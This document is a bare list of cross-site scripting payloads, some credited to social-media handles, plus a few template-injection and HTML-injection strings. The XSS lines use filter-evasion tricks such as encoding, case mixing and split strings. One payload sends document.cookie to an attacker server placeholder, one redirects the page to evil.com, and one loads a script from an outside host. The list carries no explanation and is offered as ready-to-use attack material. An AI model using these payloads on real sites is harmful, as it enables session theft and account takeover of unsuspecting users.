ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
<meter onmouseover="alert(1)" -@manjith27945363
'">><div><meter onmouseover="alert(1)"</div>" -@manjith27945363
>><marquee loop=1 width=0 onfinish=alert(1)> -@manjith27945363
<a href=&#01javascript:alert(1)> -@brutelogic
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>
"><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS
<details open id=ds\\ontoggle=alert(1)>
<details open id=ds\\ontoggle=confirm(1)>
teste"onfocus='alert()"'
teste"onfocus='confirm()"'
<iframe src='jAvAGgg:alert'1'"></iframe>
<img src=1 oNeRrOr=alert`1`>
"><img src=1 oNeRrOr=alert`1`>
<svg/Only=1 onload=alert(1)>
<x>xxx<!--><!>+>+></Script+xxx><script%20x>window/*xxx*/['al'%2b'ert'](1);//</script%20x></x><x>xxx<!--><!>+>+>
window/*xxx*/['loca' + 'tion'] = 'http://<your-server>?cookie=' + document/*xxx*/['coo' + 'kie'];
}<x>xxx<!--><!>+>+></Script+xxx></script%20x></x><x>xxx<!--><!>+>+>
}<x>xxx<!--><!>+>+></Script+xxx><Script+xxx>Object.prototype.BOOMR = 1;Object.prototype.url = 'https://portswigger-labs.net/xss/xss.js';location.replace('https://evil.com');</script%20x></x><x>xxx<!--><!>+>+>
}<x>xxx<!--><!>+>+></Script+xxx></script%20x></x><x>xxx<!--><!>+>+>
"[Click me](javascript:alert('XSS'))"



CCTI PAYLOADS:
{7*7}
{{alert(document.cookie)}}
{{$emit.constructor`alert(document.cookie)`()}}





HTML PAYLOADS:
fullname: "oi<a href="https://bing.com">click</a>
fullname: 'oi<a href=\"https://bing.com\">click</a>
fullname: <a href="//evil.com">xss</a>

